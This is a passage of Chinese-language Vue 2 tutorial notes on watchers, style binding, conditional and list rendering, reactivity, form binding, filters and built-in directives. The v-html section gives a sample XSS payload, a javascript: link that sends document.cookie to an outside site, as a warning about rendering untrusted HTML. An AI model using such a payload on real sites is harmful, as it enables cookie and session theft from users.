    1. Vue 中的 watch 默认不监测对象内部值的改变(一层)
    2. 配置 deep: true 可以监测对象内部值改变(多层)。

    备注:

    1. Vue 自身可以监测对象内部值的改变,但 Vue 提供的 watch 默认不可以
    2. 使用 watch 时根据数据的具体结构,决定是否采用深度监视。

    ​如果某个属性具有多级结构,可用如下方法监视:

    <div id="root">
    <h3>a 的值为:{{numbers.a}}</h3>
    <button @click="numbers.a++">点我让 a + 1</button>
    <h3>b 的值为:{{numbers.b}}</h3>
    <button @click="numbers.b++">点我让 b + 1</button>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    isHot: true,
    numbers: {
    a: 1,
    b: 2
    }
    },
    methods: {
    changeWeather() {
    this.isHot = !this.isHot
    }
    },
    watch: {
    'numbers.a': {
    handler(){
    console.log('a 值被改变了!')
    }
    }
    }
    })
    </script>

    ​也可通过 deep: true 开启深度监视:

    watch: {
    numbers: {
    deep: true,
    handler(){
    console.log('numbers 值被改变了!')
    }
    }
    }

    024 监视的简写形式

    watch: {
    // 简写
    isHot(newValue, oldValue) {
    console.log('isHot 被修改了', newValue, oldValue)
    }
    }

    或:

    v.$watch('isHot', function(newValue, oldValue) {
    console.log('isHot 被修改了', newValue, oldValue)
    })

    ​这么写的代价是无法配置监视属性。

    025 watch 对比 computed

    computed 和 watch 之间的区别:

    1. computed 能完成的功能,watch 都可以完成。
2. watch 能完成的功能,computed 不一定能完成,例如:watch 可以进行异步操作(示例见本节代码之后)。

    两个重要的小原则:

1. 所有被 Vue 管理的函数,最好写成普通函数,这样 this 的指向才是 vm 或组件实例对象。
2. 所有不被 Vue 所管理的函数(定时器的回调、ajax 的回调、Promise 的回调等),最好写成箭头函数,这样 this 的指向才是 vm 或组件实例对象。

    ​使用 watch 实现姓名案例:

    <div id="root">
    姓:<input type="text" v-model="firstName"><br />
    名:<input type="text" v-model="lastName"><br />
    姓名:<input type="text" v-model="fullName"><br />
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    firstName: '张',
    lastName: '三',
    fullName: '张-三'
    },
    watch: {
    firstName(val) {
    this.fullName = val + '-' + this.lastName
    },
    lastName(val) {
    this.fullName = this.firstName + '-' + val
    }
    }
    })
    </script>
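
As promised above, a sketch of the asynchronous variant (only watch can do this; a computed getter must return its value synchronously):

watch: {
firstName(val) {
// the timer callback is not managed by Vue, so it is written as an
// arrow function to keep `this` pointing at the vm (see the rule above)
setTimeout(() => {
this.fullName = val + '-' + this.lastName
}, 1000)
}
}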

    十、绑定样式

    026 绑定 class 样式

    ​绑定 class 样式:

写法与适用范围:
• 字符串写法:样式的类名不确定,需要动态指定。
• 数组写法:要绑定的样式个数不确定、名字也不确定。
• 对象写法:要绑定的样式个数确定、名字也确定,但要动态决定用不用。

    ​代码:

    <!DOCTYPE html>
    <html lang="en">

    <head>
    <meta charset="UTF-8">
    <title>Document</title>
    <style>
    .basic {
    width: 400px;
    height: 100px;
    border: 1px solid black;
    }

    .happy {
    border: 4px solid red;
    background-color: rgba(255, 255, 0, 0.644);
    background: linear-gradient(30deg, yellow, pink, orange, yellow);
    }

    .sad {
    border: 4px dashed rgb(2, 197, 2);
    background-color: gray;
    }

    .normal {
    background-color: skyblue;
    }

    .style1 {
    background-color: yellowgreen;
    }

    .style2 {
    font-size: 30px;
    text-shadow: 2px 2px 10px red;
    }

    .style3 {
    border-radius: 20px;
    }
    </style>
    <!-- 引入 Vue -->
    <script type="text/javascript" src="../js/vue.js"></script>
    </head>

    <body>
    <div id="root">
    <!-- 绑定 class 样式--字符串写法,适用于:样式的类名不确定,需要动态指定 -->
    <div class="basic" :class="mood" @click="changeMood">{{name}}</div><br><br>
    <!-- 绑定 class 样式--数组写法,适用于:要绑定的样式个数不确定、名字也不确定 -->
    <div class="basic" :class="classArr">{{name}}</div><br><br>
    <!-- 绑定 class 样式--对象写法,适用于:要绑定的样式个数确定、名字也确定,但要动态决定用不用 -->
    <div class="basic" :class="classObj">{{name}}</div>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue',
    mood: 'normal',
    classArr: ['style1', 'style2', 'style3'],
    classObj: {
    style1: false,
    style2: true
    }
    },
    methods: {
    changeMood() {
    const arr = ['happy', 'sad', 'normal']
    const index = Math.floor(Math.random() * 3)
    this.mood = arr[index]
    }
    },
    })
    </script>
    </body>

    </html>


    ​效果:

    webp

    027 绑定 style 样式

    绑定样式:

    1. class 样式

      写法:class="xxx"xxx 可以是字符串、对象、数组。

• 字符串写法适用于:类名不确定,要动态获取。
• 数组写法适用于:要绑定多个样式,个数不确定,名字也不确定。
• 对象写法适用于:要绑定多个样式,个数确定,名字也确定,但要动态决定用不用。
2. style 样式(较少用)
  :style="{fontSize: xxx}" 其中 xxx 是动态值。
  :style="[a,b]" 其中 a、b 是样式对象。

    <!-- 绑定 style 样式--对象写法 -->
    <div class="basic" :style="styleObj">{{name}}</div><br><br>
    <!-- 绑定 style 样式--数组写法 -->
    <div class="basic" :style="styleArr">{{name}}</div><br><br>

    ​对应的 Vue 实例:

styleObj: {
fontSize: '40px',
color: 'red'
},
styleObj2: {
backgroundColor: 'orange'
},
// 注意:data 对象字面量构建时还拿不到 this.styleObj,
// 所以 styleArr 直接列出样式对象(或改用计算属性)
styleArr: [
{ fontSize: '40px', color: 'red' },
{ backgroundColor: 'orange' }
]

    十一、条件渲染

    028 条件渲染

    条件渲染:

    1. v-if

      写法:

• v-if="表达式"
• v-else-if="表达式"
• v-else(不写表达式)

      适用于:切换频率较低的场景。

      特点:不展示的 DOM 元素直接被移除

      注意:v-if 可以和:v-else-ifv-else 一起使用,但要求结构不能被“打断”

    2. v-show

      写法:v-show="表达式"

      适用于:切换频率较高的场景。
      特点:不展示的 DOM 元素未被移除,仅仅是使用样式隐藏掉

3. 备注:使用 v-if 时,元素可能无法获取到,而使用 v-show 一定可以获取到。

    <div id="root">
    <h2>当前 n 的值是 {{n}}</h2>
    <button @click="n++">点我 n + 1</button>
    <!-- 使用 v-show 做条件渲染 -->
    <h2 v-show="false">欢迎来到{{name}}</h2>
    <h2 v-show="true">欢迎来到{{name}}</h2>
    <!-- 使用 v-if 做条件渲染 -->
    <h2 v-if="false">欢迎来到{{name}}</h2>
    <h2 v-if="1 === 1">欢迎来到{{name}}</h2>
    <!-- v-if、v-else-if、v-else -->
<div v-if="n === 1">Angular</div>
<div v-else-if="n === 2">React</div>
<div v-else>Vue</div>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue',
    n: 0
    }
    })
    </script>

    十二、列表渲染

    029 列表渲染

    v-for 指令:

    1. 用于展示列表数据
2. 语法:v-for="(item, index) in xxx" :key="yyy"
    3. 可遍历:数组、对象、字符串(较少用)、指定次数(较少用)
    <div id="root">
    <!-- 遍历数组 -->
    <h2>人员列表(遍历数组)</h2>
    <ul>
    <li v-for="(p, index) of persons" :key="index">
    {{p.name}}-{{p.age}}
    </li>
    </ul>
    <!-- 遍历对象 -->
    <h2>汽车信息(遍历对象)</h2>
    <ul>
    <li v-for="(value, k) of car" :key="k">
    {{k}}-{{value}}
    </li>
    </ul>
    <!-- 遍历字符串 -->
    <h2>测试遍历字符串</h2>
    <ul>
    <li v-for="(char, index) of str" :key="index">
    {{char}}-{{index}}
    </li>
    </ul>
    <!-- 遍历指定次数 -->
    <h2>测试遍历指定次数</h2>
    <ul>
    <li v-for="(number, index) of 5" :key="index">
    {{number}}-{{index}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue',
    persons: [
    {id: '001', name: '张三', age: 18},
    {id: '002', name: '李四', age: 19},
    {id: '003', name: '王五', age: 20}
    ],
    car: {
    name: '奥迪 A8',
    price: 'price',
    color: '黑色'
    },
    str: 'hello'
    }
    })
    </script>

    webp

    030 key 作用与原理

    面试题:reactvue 中的 key 有什么作用?(key 的内部原理)

    1. 虚拟 DOM 中 key 的作用:key 是虚拟 DOM 对象的标识,当状态中的数据发生变化时,Vue 会根据【新数据】生成【新的虚拟 DOM】随后 Vue 进行【新虚拟 DOM】与【旧虚拟 DOM】的差异比较,比较规则如下:

    2. 对比规则:

• 旧虚拟 DOM 中找到了与新虚拟 DOM 相同的 key:
  • 若虚拟 DOM 中内容没变,直接使用之前的真实 DOM;
  • 若虚拟 DOM 中内容变了,则生成新的真实 DOM,随后替换掉页面中之前的真实 DOM。
• 旧虚拟 DOM 中未找到与新虚拟 DOM 相同的 key:
  创建新的真实 DOM,随后渲染到页面。

3. index 作为 key 可能会引发的问题:

      • 若对数据进行:逆序添加、逆序删除等破坏顺序操作

        会产生没有必要的真实 DOM 更新 ==>界面效果没问题,但效率低。

      • 如果结构中还包含输入类的 DOM:会产生错误 DOM 更新 ==> 界面有问题。

4. 开发中如何选择 key?

      • 最好使用每条数据的唯一标识作为 key,比如 id、手机号、身份证号、学号等唯一值。
      • 如果不存在对数据的逆序添加、逆序删除等破坏顺序操作,仅用于渲染列表用于展示,使用 index 作为 key 是没有问题的。

    webp

    webp

    031 列表过滤

    ​将过滤后的结果存在 filPersons 中,查找时在 persons 中进行,这样就不会破坏原数据。

    <div id="root">
    <input type="text" placeholder="请输入搜索关键字..." v-model="keyword">
    <ul>
    <li v-for="(p, index) of filPersons" :key="p.id">
    {{p.name}}-{{p.age}}-{{p.sex}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    keyword: '',
    persons: [
    {id: '001', name: '马冬梅', age: 30, sex: '女'},
    {id: '002', name: '周冬雨', age: 31, sex: '女'},
    {id: '003', name: '周杰伦', age: 21, sex: '男'},
    {id: '004', name: '温兆伦', age: 22, sex: '男'},
    ],
    filPersons: []
    },
    watch: {
    keyword: {
    immediate: true,
    handler(val) {
    this.filPersons = this.persons.filter((p) => {
    return p.name.indexOf(val) !== -1
    })
    }
    }
    }
    })
    </script>
    <div id="root">
    <input type="text" placeholder="请输入搜索关键字..." v-model="keyword">
    <ul>
    <li v-for="(p, index) of filPersons" :key="p.id">
    {{p.name}}-{{p.age}}-{{p.sex}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    keyword: '',
    persons: [
    {id: '001', name: '马冬梅', age: 30, sex: '女'},
    {id: '002', name: '周冬雨', age: 31, sex: '女'},
    {id: '003', name: '周杰伦', age: 21, sex: '男'},
    {id: '004', name: '温兆伦', age: 22, sex: '男'},
    ]
    },
    computed: {
    filPersons() {
    return this.persons.filter((p) => {
    return p.name.indexOf(this.keyword) !== -1
    })
    }
    }
    })
    </script>

    032 列表排序

    ​JavaScript 中 .sort()

    • 前减后,升序排序。
    • 后减前,降序排序。

    ​以此:

    <div id="root">
    <input type="text" placeholder="请输入搜索关键字..." v-model="keyword">
    <button @click="sortType = 2">年龄升序</button>
    <button @click="sortType = 1">年龄降序</button>
    <button @click="sortType = 0">原顺序</button>
    <ul>
    <li v-for="(p, index) of filPersons" :key="p.id">
    {{p.name}}-{{p.age}}-{{p.sex}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue',
    sortType: 0, // 0 原顺序,1 降序,2 升序
    keyword: '',
    persons: [
    {id: '001', name: '马冬梅', age: 30, sex: '女'},
    {id: '002', name: '周冬雨', age: 31, sex: '女'},
    {id: '003', name: '周杰伦', age: 21, sex: '男'},
    {id: '004', name: '温兆伦', age: 22, sex: '男'},
    ]
    },
    computed: {
    filPersons() {
    const arr = this.persons.filter((p) => {
    return p.name.indexOf(this.keyword) !== -1
    })
    // 判断一下是否需要排序
    if (this.sortType) {
    arr.sort((p1, p2) => {
    return this.sortType === 1 ? p2.age - p1.age : p1.age - p2.age
    })
    }

    return arr
    }
    }
    })
    </script>

    033 更新时的一个问题 & 034 Vue 监测数据的原理_对象

    Vue 中监测数据变化的核心机制是其响应式系统,它通过 数据劫持依赖收集 实现对数据变化的侦测和响应式更新。以下是其背后的主要原理:


    1. 数据劫持(Object.defineProperty 或 Proxy)

    Vue 2 使用 Object.defineProperty,Vue 3 则切换到更强大的 Proxy

    Vue 2 中的实现:
    • 使用 Object.defineProperty 来拦截对象属性的 读取设置 操作。
    • 对于每个属性,定义了 gettersetter 方法:
      • getter:在属性被访问时触发,进行依赖收集。
      • setter:在属性被修改时触发,通知依赖更新。
    局限性:
    • 只能劫持对象的已有属性,新增属性或删除属性不会触发响应式(需要使用 Vue.set)。
• 对数组的原生方法(如 push、splice)需要特殊处理,通过重写这些方法实现响应式。
    Vue 3 中的优化:
    • 使用 Proxy,可以直接监听对象的所有操作(包括新增、删除属性和数组索引的修改)。
    • 更加灵活、性能更高,解决了 Vue 2 的一些局限性。

    2. 依赖收集

    Vue 的响应式系统通过依赖收集和发布订阅模式实现。

    关键组件:
    • Watcher
      • 每个组件或计算属性都有一个 Watcher 实例,负责记录对响应式数据的依赖。
      • 当依赖的数据发生变化时,Watcher 会被触发更新。
    • Dep(Dependency)
      • 一个依赖管理器,用来保存所有依赖某个响应式数据的 Watcher
      • 当数据发生变化时,Dep 会通知相关的 Watcher 进行更新。
    工作流程:
1. 数据被访问时(通过 getter),当前活动的 Watcher 会被添加到该数据的依赖列表中。
2. 数据被修改时(通过 setter),触发对应的 Dep 通知所有依赖更新。

    3. 虚拟 DOM 与批量更新

    Vue 使用虚拟 DOM 结合异步队列优化更新流程:

    • 当数据变化时,setter 通知依赖更新,但不会立即更新 DOM。
    • Vue 会将更新操作放入队列中,并在下一个事件循环中批量更新,避免频繁的 DOM 操作。
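
One practical consequence of this batching: reading the DOM immediately after changing data returns the old content. Vue 2 exposes vm.$nextTick for code that must run after the re-render; a small sketch (the message property and the #msg element are hypothetical):

vm.message = 'updated'
// at this point the real DOM has not been patched yet
vm.$nextTick(() => {
// runs after the queued update has been flushed to the DOM
console.log(document.querySelector('#msg').textContent) // 'updated'
})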

    4. 响应式原理的应用

    响应式系统支持以下特性:

    • 双向绑定:通过 v-model 实现表单与数据的同步。
    • 计算属性:基于依赖的变化自动计算。
    • 侦听器:通过 watch 监控特定数据的变化并执行回调。

    总结

    Vue 的响应式系统通过以下机制协作:

    1. 使用数据劫持技术(Vue 2:Object.defineProperty,Vue 3:Proxy)。
    2. 实现依赖收集和发布订阅模式。
    3. 结合虚拟 DOM 和异步更新队列,确保性能和开发体验。

    这种设计不仅高效,而且为开发者屏蔽了复杂性,使得数据绑定和状态管理变得直观。
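
As a toy illustration of the data-hijacking half of this design (greatly simplified; the real Observer / Dep / Watcher machinery is omitted):

function observe(data) {
Object.keys(data).forEach(key => {
let value = data[key]
Object.defineProperty(data, key, {
get() {
// real Vue records the currently active Watcher here (dependency collection)
return value
},
set(newValue) {
if (newValue === value) return
value = newValue
// real Vue notifies the Dep, which schedules a re-render
console.log(key + ' changed, trigger update')
}
})
})
}

const state = { isHot: true }
observe(state)
state.isHot = false // logs: isHot changed, trigger update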

    035 Vue.set() 方法

一个属性必须有 get() 和 set() 才能被 Vue 跟踪到!如果要给 data 中的一个对象加一个属性,可以使用 Vue.set() 来实现(这样才会有 get() 和 set()):

    <div id="root">
    <h1>学生信息</h1>
    <button @click="addSex">添加一个性别属性,默认值是男</button>
    <h2>姓名:{{student.name}}</h2>
    <h2 v-if="student.sex">性别:{{student.sex}}</h2>
    <h2>年龄:真实{{student.age.rAge}},对外{{student.age.sAge}}</h2>
    <h2>朋友们</h2>
    <ul>
    <li v-for="(f, index) in student.friends" :key="index">
    {{f.name}}-{{f.age}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    student: {
    name: 'tom',
    age: {
    rAge: 40,
    sAge: 29,
    },
    friends: [
    {name: 'jerry', age: 35},
    {name: 'tony', age: 36}
    ]
    }
    },
    methods: {
    addSex() {
    // Vue.set(this.student, 'sex', '男')
    this.$set(this.student, 'sex', '男')
    }
    }
    })
    </script>

    036 Vue 检测数据的原理_数组

直接通过索引修改数组元素不会被跟踪!只有在使用下列与数组有关的方法时,Vue 才会检测到数组被改变,从而完成跟踪(内部用到了包装技术):

    在 Vue 2 中,数组的更新检测是有限制的。由于 JavaScript 的数组特性,Vue 无法侦听某些直接的数组操作,因此提供了一些内置的方法来实现响应式更新。这些方法对 Vue 2 的响应式系统进行了增强,确保数据变更能被正确地检测到和响应。

    Vue 2 对数组的更新检测提供了以下七个方法,这些方法都是对原生数组方法的包装:


    1. push()

    • 功能:向数组末尾添加一个或多个元素。

    • 触发更新:响应式地添加新元素并触发视图更新。

      let vm = new Vue({
      data: {
      items: [1, 2, 3]
      }
      });

      vm.items.push(4); // 响应式更新视图

    2. pop()

    • 功能:移除数组末尾的元素。
    • 触发更新:响应式地移除最后一个元素并触发视图更新。
      vm.items.pop(); // 移除 3,视图更新

    3. shift()

    • 功能:移除数组开头的元素。
    • 触发更新:响应式地移除第一个元素并触发视图更新。
      vm.items.shift(); // 移除 1,视图更新

    4. unshift()

    • 功能:向数组开头添加一个或多个元素。
    • 触发更新:响应式地在开头添加新元素并触发视图更新。
      vm.items.unshift(0); // 添加 0,视图更新

    5. splice()

    • 功能:添加、替换或删除数组中的元素。
    • 触发更新:响应式地修改数组并触发视图更新。
      vm.items.splice(1, 1, 'a'); // 替换索引 1 的元素为 'a'

    6. sort()

    • 功能:对数组进行排序。
    • 触发更新:响应式地对数组排序并触发视图更新。
      vm.items.sort(); // 按字典序排序,视图更新

    7. reverse()

    • 功能:反转数组顺序。
    • 触发更新:响应式地反转数组并触发视图更新。
      vm.items.reverse(); // 反转数组顺序,视图更新

    注意事项

    1. 对数组的直接索引赋值不会触发更新

      • Vue 2 无法侦测类似 vm.items[0] = 10 这样的操作。
      • 解决办法:使用 Vue.set()
        Vue.set(vm.items, 0, 10); // 响应式更新索引 0 的值
    2. 数组长度的直接修改不会触发更新

      • 类似 vm.items.length = 2 的操作不会触发响应式更新。
      • 避免直接修改数组长度。

    通过这些方法,Vue 2 能够对数组的变更进行有效的监听,并自动触发相关的视图更新。这种响应式机制是 Vue 2 的核心功能之一。

    ​也可用 Vue.set() 改变数组的值来更新数组。

    Vue.set(vm._data.student.hobby, 1, '打台球')

    037 总结 Vue 监视数据

    ​Vue 监视数据的原理:

    1. Vue 会监视 data 中所有层次的数据;

    2. 如何监测对象中的数据?

      通过 setter 实现监视,且要在 new Vue 时就传入要监测的数据。

      • 对象中后追加的属性,Vue 默认不做响应式处理
      • 如需给后添加的属性做响应式,请使用如下 API:
        • Vue.set(target, propertyName/index, value)
• vm.$set(target, propertyName/index, value)
    3. 如何监测数组中的数据?

      通过包裹数组更新元素的方法实现,本质就是做了两件事:

      • 调用原生对应的方法对数组进行更新。
      • 重新解析模板,进而更新页面。
    4. 在 Vue 修改数组中的某个元素一定要用如下方法:

• 使用这些 API:push()、pop()、shift()、unshift()、splice()、sort()、reverse()
• Vue.set() 或 vm.$set()

特别注意:Vue.set() 和 vm.$set() 不能给 vm 或 vm 的根数据对象添加属性!


    <div id="root">
    <h1>学生信息</h1>
    <button @click="student.age++">年龄 +1 岁</button><br>
    <button @click="addSex">添加性别属性,默认值:男</button><br>
    <button @click="student.sex = '未知'">修改性别</button><br>
    <button @click="addFriend">在列表首位添加一个朋友</button><br>
    <button @click="updateFirstFriendName">修改第一个朋友的名字为:张三</button><br>
    <button @click="addHobby">添加一个爱好</button><br>
    <button @click="updateHobby">修改第一个爱好为:开车</button><br>
    <button @click="removeSmoke">过滤掉爱好中的抽烟</button><br>
    <h3>姓名:{{student.name}}</h3>
    <h3>年龄:{{student.age}}</h3>
    <h3 v-if="student.sex">性别:{{student.sex}}</h3>
    <h3>爱好:</h3>
    <ul>
    <li v-for="(h, index) in student.hobby" :key="index">
    {{h}}
    </li>
    </ul>
    <h3>朋友们:</h3>
    <ul>
<li v-for="(f, index) in student.friends" :key="index">
    {{f.name}}--{{f.age}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    student: {
    name: 'tom',
    age: 18,
    hobby: ['抽烟', '喝酒', '烫头'],
    friends: [
    {name: 'jerry', age: 35},
    {name: 'tony', age: 36}
    ]
    }
    },
    methods: {
    addSex() {
    this.$set(this.student, 'sex', '男')
    },
    addFriend() {
    this.student.friends.unshift({name: 'mike', age: 18})
    },
    updateFirstFriendName() {
    this.student.friends[0].name = '张三'
    },
    addHobby() {
    this.student.hobby.push('打台球')
    },
    updateHobby() {
    this.$set(this.student.hobby, 0, '开车')
    },
    removeSmoke() {
    this.student.hobby = this.student.hobby.filter((h)=>{
    return h !== '抽烟'
    })
    }
    }
    })
    </script>

    十三、收集表单数据

    038 收集表单数据

    收集表单数据:
若:<input type="text"/>,则 v-model 收集的是 value 值,用户输入的就是 value 值。
    若:<input type="radio"/>,则 v-model 收集的是 value 值,且要给标签配置 value 值。
    若:<input type="checkbox"/>

    1. 没有配置 inputvalue 属性,那么收集的就是 checked(勾选 or 未勾选,是布尔值)
    2. 配置 inputvalue 属性:
      • v-model 的初始值是非数组,那么收集的就是 checked(勾选 or 未勾选,是布尔值)
• v-model 的初始值是数组,那么收集的就是 value 组成的数组

    备注:v-model 的三个修饰符:

    • lazy:失去焦点再收集数据
    • number:输入字符串转为有效的数字
    • trim:输入首尾空格过滤

    ​代码:

    <div id="root">
    <form @submit="demo">
    <label for="account">账号:</label><input type="text" id="account" v-model.trim="account"><br><br>
    <label for="password">密码:</label><input type="password" id="password" v-model="password"><br><br>
<label for="age">年龄:</label><input type="number" id="age" v-model.number="age"><br><br>
    性别:
男<input type="radio" name="sex" v-model="sex" value="male">
女<input type="radio" name="sex" v-model="sex" value="female"><br><br>
    爱好:
    学习<input type="checkbox" v-model="hobby" value="study">
    打游戏<input type="checkbox" v-model="hobby" value="play">
    吃饭<input type="checkbox" v-model="hobby" value="eat"><br><br>
    所属校区
    <select v-model="city">
    <option value="">请选择校区</option>
    <option value="beijing">北京</option>
    <option value="shanghai">上海</option>
    <option value="shenzhen">深圳</option>
    <option value="wuhan">武汉</option>
    </select><br><br>
    其他信息:
    <textarea v-model.lazy="others"></textarea><br><br>
    <input type="checkbox" v-model="agree">阅读并接受<a href="www.baidu.com">《用户协议》</a><br><br>
    <button type="submit">提交</button>
    </form>

    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    account: '',
    password: '',
    age: '',
    sex: 'male',
    hobby: [],
    city: 'wuhan',
    others: '',
    agree: ''
    },
    methods: {
    demo() {
    alert("提交数据" + JSON.stringify(this._data))
    }
    }
    })
    </script>

    ​使用 <form> 语句建立一个表单,@submit="demo" 表示提交这个表单时将执行 demo() 函数。

名称 / 实现 / 备注:
• 账号:<label for="account">账号:</label><input type="text" id="account" v-model.trim="account">。<label> 的 for 绑定同名 id 的 <input>,点击提示文本也会让输入框获得焦点;.trim 表示移除首尾空格。
• 密码:<label for="password">密码:</label><input type="password" id="password" v-model="password">。type="password" 表示以密码的形式接受输入。
• 年龄:<label for="age">年龄:</label><input type="number" id="age" v-model.number="age">。type="number" 表示接受数字作为输入;v-model.number 表示把输入转换成数字(而不是字符串)。
• 性别:男<input type="radio" name="sex" v-model="sex" value="male"> 女<input type="radio" name="sex" v-model="sex" value="female">。name="sex" 实现单选;value="male" 和 value="female" 控制选中时提交的值。
• 爱好:学习<input type="checkbox" v-model="hobby" value="study"> 打游戏<input type="checkbox" v-model="hobby" value="play"> 吃饭<input type="checkbox" v-model="hobby" value="eat">。hobby 初始化为数组才可以多选。
• 所属校区:<select v-model="city"> 搭配若干 <option value="...">,选中某项时提交对应的 value。
• 其他信息:<textarea v-model.lazy="others"></textarea>。v-model.lazy 在失去焦点时才更新值,从而提升性能。
• 阅读并接受:<input type="checkbox" v-model="agree">阅读并接受<a href="www.baidu.com">《用户协议》</a>。默认的 type="checkbox" 选中返回 true,未选中返回 false。
• 提交:<button type="submit">提交</button>。type="submit" 可加可不加,因为 <form> 中默认第一个 <button> 按下后会提交表单。

    webp

    十四、过滤器

    039 过滤器

    过滤器:

    定义:对要显示的数据进行特定格式化后再显示(适用于一些简单逻辑的处理,复杂的还是 computedmethods

    语法:

1. 注册过滤器:Vue.filter(name, callback)(全局)或 new Vue({filters: {...}})(局部)
2. 使用过滤器:{{xxx | 过滤器名}} 或 v-bind:属性="xxx | 过滤器名"

    备注:

    1. 过滤器也可以接收额外参数、多个过滤器也可以串联
    2. 并没有改变原本的数据,是产生新的对应的数据

从 BootCDN - Bootstrap 中文网开源项目免费 CDN 加速服务 铂特优选 处可以找到常用的 js 库。这里整一个 dayjs.min.js。

    ​操作一下:

    <div id="root">
    <h2>显示格式化后的时间</h2>
    <!-- 计算属性实现 -->
    <h3>现在是:{{fmtTime}}</h3>
    <!-- methods 实现 -->
    <h3>现在是:{{getFmtTime()}}</h3>
    <!-- 过滤器实现 -->
    <h3>现在是:{{time | timeFormater}}</h3>
    <!-- 过滤器实现(传参) -->
    <h3>现在是:{{time | timeFormater('YYYY-MM-DD') | mySlice}}</h3>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    time: 1731817795096
    },
    computed: {
    fmtTime() {
    return dayjs(this.time).format('YYYY-MM-DD HH:mm:ss')
    }
    },
    methods: {
    getFmtTime() {
    return dayjs(this.time).format('YYYY-MM-DD HH:mm:ss')
    }
    },
    filters: {
    timeFormater(value, format='YYYY-MM-DD HH:mm:ss') {
    return dayjs(value).format(format)
    },
    mySlice(value) {
    return value.slice(0, 4)
    }
    }
    })
    </script>

    十五、内置指令

    040 v-text 指令

下面的代码将在 <div> 之间生成文本,但是不会渲染其中的 HTML 结构。

    <div id="root">
    <div v-text="name"></div>
    <div>{{name}}</div>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
name: '<h2>古尔丹</h2>'
    }
    })
    </script>

    041 v-html 指令

    v-html 指令:

1. 作用:向指定节点中渲染包含 html 结构的内容。
    2. 与插值语法的区别:
• v-html 会替换掉节点中所有的内容,{{xx}} 和 v-text 则不会。
      • v-html 可以识别 html 结构。
    3. 严重注意:v-html 有安全性问题!
      • 在网站上动态渲染任意 HTML 是非常危险的,容易导致 XSS 攻击
      • 一定要在可信的内容上使用 v-html永不要用在用户提交的内容上

下面的代码将在 <div> 之间生成文本,并且会渲染其中的 HTML 结构。

    <div id="root">
    <div v-html="name"></div>
    <div>{{name}}</div>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
name: '<a href=javascript:location.href="http://www.baidu.com?" + document.cookie>点开有惊喜!</a>'
    }
    })
    </script>

    ​这段代码是危险的,这可能把该网站的 cookie 送给另一个网站中,如果网站的 cookie 中的关键信息没有使用 HttpOnly,可能导致信息泄露!

    webp

    webp

    ​服务器根据 cookie 决定用户是否登录。同样的 cookie 可以登录同样的账户。

    042 v-cloak 指令

    v-cloak 指令(没有值):

    1. 本质是一个特殊属性,Vue 实例创建完毕并接管容器后,会删掉 v-cloak 属性。
    2. 使用 css 配合 v-cloak 可以解决网速慢时页面展示出 {{xxx}} 的问题。
    [v-cloak] {
    display: none;
    }
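
Putting the two pieces together, a typical pattern looks like this (sketch):

<style>
[v-cloak] { display: none; }
</style>
<div id="root">
<!-- hidden until Vue takes over the container and removes v-cloak -->
<h2 v-cloak>{{name}}</h2>
</div>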

    043 v-once 指令

    v-once 指令:

    1. v-once 所在节点在初次动态渲染后,就视为静态内容了。
    2. 以后数据的改变不会引起 v-once 所在结构的更新,可以用于优化性能。
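
For example (sketch): the first heading keeps the initial value of n, while the second keeps updating.

<div id="root">
<h2 v-once>初始的 n 值是:{{n}}</h2>
<h2>当前的 n 值是:{{n}}</h2>
<button @click="n++">点我 n + 1</button>
</div>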

    044 v-pre 指令

    v-pre 指令:

    1. 跳过其所在节点的编译过程。
    2. 可利用它跳过:没有使用指令语法、没有使用插值语法的节点,会加快编译。
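
For example (sketch): the compiler skips the v-pre node, so its mustache syntax is rendered literally.

<h2 v-pre>Vue 其实很简单:{{n}}</h2> <!-- left as-is, the literal {{n}} shows up -->
<h2>当前的 n 值是:{{n}}</h2> <!-- compiled normally -->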

    十六、自定义指令

    045 自定义指令-函数式 & 046 自定义指令-对象式

    ​使用 directives 创建一个自定义指令:

directives 下的函数接收两个参数:element(指令所绑定的真实 DOM 元素)和 binding(包含绑定信息的对象)。

    <div id="root">
